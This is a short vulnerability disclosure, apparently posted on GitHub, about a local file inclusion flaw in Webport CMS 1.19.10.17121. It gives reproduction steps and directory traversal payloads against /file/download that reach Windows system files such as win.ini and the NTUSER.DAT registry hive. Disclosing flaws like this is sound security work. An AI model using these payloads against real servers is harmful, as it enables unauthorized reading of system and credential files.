Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

LFI Vulnerability Webport CMS version 1.19.10.17121

Expected behaviour:

This script is possibly vulnerable to directory traversal attacks. LFI is a vulnerability which allows attackers to access restricted directories and read files outside of the web server's root directory. The vulnerability affects http://localhost/file/download via value file.

Impact:

Local File Inclusion (LFI) vulnerability vary from information disclosure to complete compromise of the system. Even in cases where the included code is not executed, it can still give an attacker enough valuable information to be able to compromise the system.

Steps to reproduce:

  1. Go to login admin
  2. Inject payload via /file/download?file=
  3. For example: ../../Users/Default/NTUSER.DAT

POC:

  1. Payload: /file/download?file=../../windows/addins/FXSEXT.ecf alt tag
  2. Payload: /file/download?file=../../windows/win.ini alt tag